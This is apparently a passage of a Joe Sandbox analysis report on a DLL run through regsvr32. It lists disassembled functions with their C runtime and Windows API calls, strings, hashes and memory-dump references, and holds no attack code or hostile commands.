Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 1003749F
__getptd.LIBCMT ref: 100374AD

Strings

MOC, xrefs: 10037480
csm, xrefs: 10037487

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction ID: 4aa484bfd58dbd3435781d5c114dead901570b21edfee72e4775129354a6ca63
Opcode Fuzzy Hash: e3b2ebf427159775b670ccfe04d8264cb15add95c28ba503ee76d0db9538cd89
Instruction Fuzzy Hash: 59E012395142448FC322DA64D046B283AE4FB4A216F5A04A1E54C8F223CB38F8809692

Uniqueness

Uniqueness Score: -1.00%

Function 1002A742, Relevance: 7.6, APIs: 5, Instructions: 54stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 1002A76E
_memset.LIBCMT ref: 1002A78B
GetWindowTextA.USER32 ref: 1002A7A5
lstrcmpA.KERNEL32(00000000,?), ref: 1002A7B7
SetWindowTextA.USER32(?,?), ref: 1002A7C3

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction ID: 26b6340e82542b1e4468bed3117474a07e50960d7f5f1af9f26f2e201bf88dc7
Opcode Fuzzy Hash: eba42bef06e1ea26d0eb59e6d93e6a074b965602a881250286a8b19bcf32aa76
Instruction Fuzzy Hash: 6201C4B6600224ABEB11DB64AEC4BDA77BCEB56750F410062FA05D3141DA709E8487A4

Uniqueness

Uniqueness Score: -1.00%

Function 1003303D, Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10033049

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__amsg_exit.LIBCMT ref: 10033069
__lock.LIBCMT ref: 10033079
InterlockedDecrement.KERNEL32(?), ref: 10033096
InterlockedIncrement.KERNEL32(04C11600), ref: 100330C1

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction ID: 0569f5a3ac8da4acb0d1a986d046cd977373cb471ce5986ef029c0716cf573c4
Opcode Fuzzy Hash: b7e179927d4189d82ebcc7d242cd09fbde42b95b3021a06d9a3f9b095d1226b3
Instruction Fuzzy Hash: 6701AD35E01B61AFE716DB68889675E77A0FF01BA2F018205F910AF3A1CB347850CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 10043707, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 1004370E
_Fputc.LIBCPMT ref: 10043762
_Fputc.LIBCPMT ref: 10043890

Strings

, xrefs: 1004381A

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Fputc$H_prolog3_
String ID:
API String ID: 2569218679-3916222277
Opcode ID: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction ID: 327ff4da5823006f03605dc28747a7ba7b3d1cf190d8e7353a19ee1d8cd02c88
Opcode Fuzzy Hash: 958f7fde8cf3934525be4b4590de41da191db7979d055f19d5a6abdfe82d0e64
Instruction Fuzzy Hash: 74515CB6A046489BCB29CBA4C8919DEB7B5EF48310F31D539F552E7291EF70B808CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10028683, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Part of subcall function 1002ACFB: __EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetProcAddress.KERNEL32(00000000,HtmlHelpA,10027AEC,0000000C), ref: 100286CC
FreeLibrary.KERNEL32(?), ref: 100286DC

Strings

hhctrl.ocx, xrefs: 100286B0
HtmlHelpA, xrefs: 100286C6

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction ID: 005129d9915a41a8e27983cdb1c3ef0c0b08f3353e048253c6f2f10206dc3ba7
Opcode Fuzzy Hash: 7eafd78b95f4e71f9a7c2a9e0d78888fac0c88a0cb5b3df1705197983d44129d
Instruction Fuzzy Hash: 7D01AD39001A07ABD722DB60FD09B4B3BD4EF04751F90882AFA5AA5462DB70E9509B59

Uniqueness

Uniqueness Score: -1.00%

Function 10037AE5, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 10037AF8

Part of subcall function 10037A53: ___BuildCatchObjectHelper.LIBCMT ref: 10037A89

_UnwindNestedFrames.LIBCMT ref: 10037B0F
___FrameUnwindToState.LIBCMT ref: 10037B1D

Strings

csm, xrefs: 10037AF4, 10037B09, 10037B1C, 10037B3A, 10037B4A

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction ID: f623d6fd13c583f27d9dc74078cf60041b57e54907eb0ea25ac4e83ce510980d
Opcode Fuzzy Hash: f195471c9651215b8799b1dff3133e99b074ac86d89a3ab6fa62fa96ed46b13b
Instruction Fuzzy Hash: 1301E475001109BFDF239E51CC41EAB7FAAFF08392F108014BD1C19121D736E9A1EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1003B6EA, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1003198E), ref: 1003B6EF
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003B6FF

Strings

IsProcessorFeaturePresent, xrefs: 1003B6F9
KERNEL32, xrefs: 1003B6EA

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction ID: 1963b1661ff3506828beccd1ed570aedb4cc9858b4c3caadb466faf93440aec0
Opcode Fuzzy Hash: b625c795e4b14fe0a5397004e64ae313e176778416d8ae412e329f0da2c945c9
Instruction Fuzzy Hash: FAF09030D0090DE6EF006BA1AE4A2AF7BB8FB8134AF9204A0E295F0094CF30C074C345

Uniqueness

Uniqueness Score: -1.00%

Function 10043F42, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043F49

Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF

std::bad_exception::bad_exception.LIBCMT ref: 10043F66

Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6

__CxxThrowException@8.LIBCMT ref: 10043F74

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

Strings

invalid string position, xrefs: 10043F4E

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrow_strlenstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 843739861-1799206989
Opcode ID: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
Instruction ID: 29482f66c8a5f8716b1ced5184e44cdebd8c398cac92a99365ce02766c2dbf89
Opcode Fuzzy Hash: 45ad777bced333e79dc8783b5ddc33aee8a57e63d6a6dab2f02a1dc112f26aec
Instruction Fuzzy Hash: 6FD0127580004D9ADB05DBD0CC55EDE7378EB14311F541835B301EA041DF747A49C658

Uniqueness

Uniqueness Score: -1.00%

Function 10003190, Relevance: 6.4, APIs: 5, Instructions: 119COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100031BF
SetLastError.KERNEL32(0000007F), ref: 100031EB

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction ID: 4eaf8ab176a3ef0a7f39cefad6a7452b8358f787e5b85b158199dac7f5a3fe15
Opcode Fuzzy Hash: be243d1140ffaf3f5c0c670d3f2cc449d13f2587e7475c66dd1e7082ab2392ba
Instruction Fuzzy Hash: D051E770E0415ADFEB05CF98C981AAEB7F5FF48344F2085A9E815AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043370, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10043377
_fgetc.LIBCMT ref: 100434AD

Part of subcall function 100432DD: std::_String_base::_Xlen.LIBCPMT ref: 100432F3

_memcpy_s.LIBCMT ref: 10043472
_ungetc.LIBCMT ref: 100434F8

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
String ID:
API String ID: 9762108-0
Opcode ID: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction ID: 13a944e20a8a26727cade03676e391ccd69925211a3dd35b2a339be84363c332
Opcode Fuzzy Hash: 99201e9437667c55015348abdb3458414e8582c21c8e059d90a996027ebc780c
Instruction Fuzzy Hash: CF515C76A006089FCB15DBB4C8919DEB7B9FF48210F70953AE552E7191EE60F908CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10044EAE, Relevance: 6.1, APIs: 4, Instructions: 137COMMONLIBRARYCODE

Download Yara Rule

APIs

__flush.LIBCMT ref: 10044F72
__fileno.LIBCMT ref: 10044F92
__locking.LIBCMT ref: 10044F99
__flsbuf.LIBCMT ref: 10044FC4

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

Part of subcall function 10032DE1: __decode_pointer.LIBCMT ref: 10032DEC

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
Instruction ID: f2cbb9fbd7bb741866626b2388375d2bcd999be80ff2815986012e88e7b340f8
Opcode Fuzzy Hash: 956221b4076386118c712c8f64a0eb647298e6b25e76d36a604d25e1bab44899
Instruction Fuzzy Hash: 48418F35A00605DFDB15CFAA888099EB7F6EF80360F328639E855D7580EB71EE45CB48

Uniqueness

Uniqueness Score: -1.00%

Function 1003EEC4, Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003EEF8
__isleadbyte_l.LIBCMT ref: 1003EF2C
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EF5D
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,?,?,1004E688,00000000,00000000,00000020), ref: 1003EFCB

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction ID: 26013823be584ed4b010159d5efc2338de830fada2216c2f4930337caeab7791
Opcode Fuzzy Hash: 96643137e7721e308861157e0faa2d4bf1abe89a8bc138eb09a9c9d576fa028f
Instruction Fuzzy Hash: 52318931A002D6EFDB12DF64C880AAA7BE5EF41352F1286A9F4648F1E1D770AD40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002B564, Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002B5F7
__msize.LIBCMT ref: 1002B61A
_malloc.LIBCMT ref: 1002B632
_malloc.LIBCMT ref: 1002B647

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction ID: c06ad2b89a0fc854e88fd2117b33bcd0e6f9c9f7914c74f6532cfdf5cd9cd5d6
Opcode Fuzzy Hash: e7775de412d4773406d2d7f9127a0febec078a8c984ec9c0c9f408937bca0ff2
Instruction Fuzzy Hash: 9D218231600E249FCB55EF30F8C9A5A77E5EF04790BD18519E8598B256DF34ECA0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 100210FF, Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 10023B39
__CxxThrowException@8.LIBCMT ref: 10023B55
__CxxThrowException@8.LIBCMT ref: 10023B71
__cftof.LIBCMT ref: 10023B88

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8Throw$__cftof
String ID:
API String ID: 887240167-0
Opcode ID: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction ID: 16327421f0b36ea26aeda1f7d289ca1428dc81c908886c4e3e3252d19e74a35c
Opcode Fuzzy Hash: 4211e913ba8b62f1cad3a260a4951dcfba4da381e4675b2fc4cd124fb216e819
Instruction Fuzzy Hash: 6201C07980024CBB8B11DE899C46CDF7BEDEA88250BB00152FB19C3501DAB1EE20D2A2

Uniqueness

Uniqueness Score: -1.00%

Function 10023180, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,00000000,00000005), ref: 100231A8
LoadResource.KERNEL32(?,00000000), ref: 100231B0
LockResource.KERNEL32(00000000), ref: 100231C2
FreeResource.KERNEL32(00000000), ref: 10023210

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10024E13, Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10024E1A

Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F

__CxxThrowException@8.LIBCMT ref: 10024E50
FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B

Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88

LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4

Memory Dump Source

Source File: 00000002.00000002.669397905.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.669392581.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669434069.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.669442127.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669447377.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.669472492.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669476097.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.669480316.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
String ID:
API String ID: 1808948168-0
Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100217AE, Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100217B5

Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4

__strdup.LIBCMT ref: 100217D7
GetCurrentThread.KERNEL32 ref: 10021804
GetCurrentThreadId.KERNEL32 ref: 1002180D

Memory Dump Source

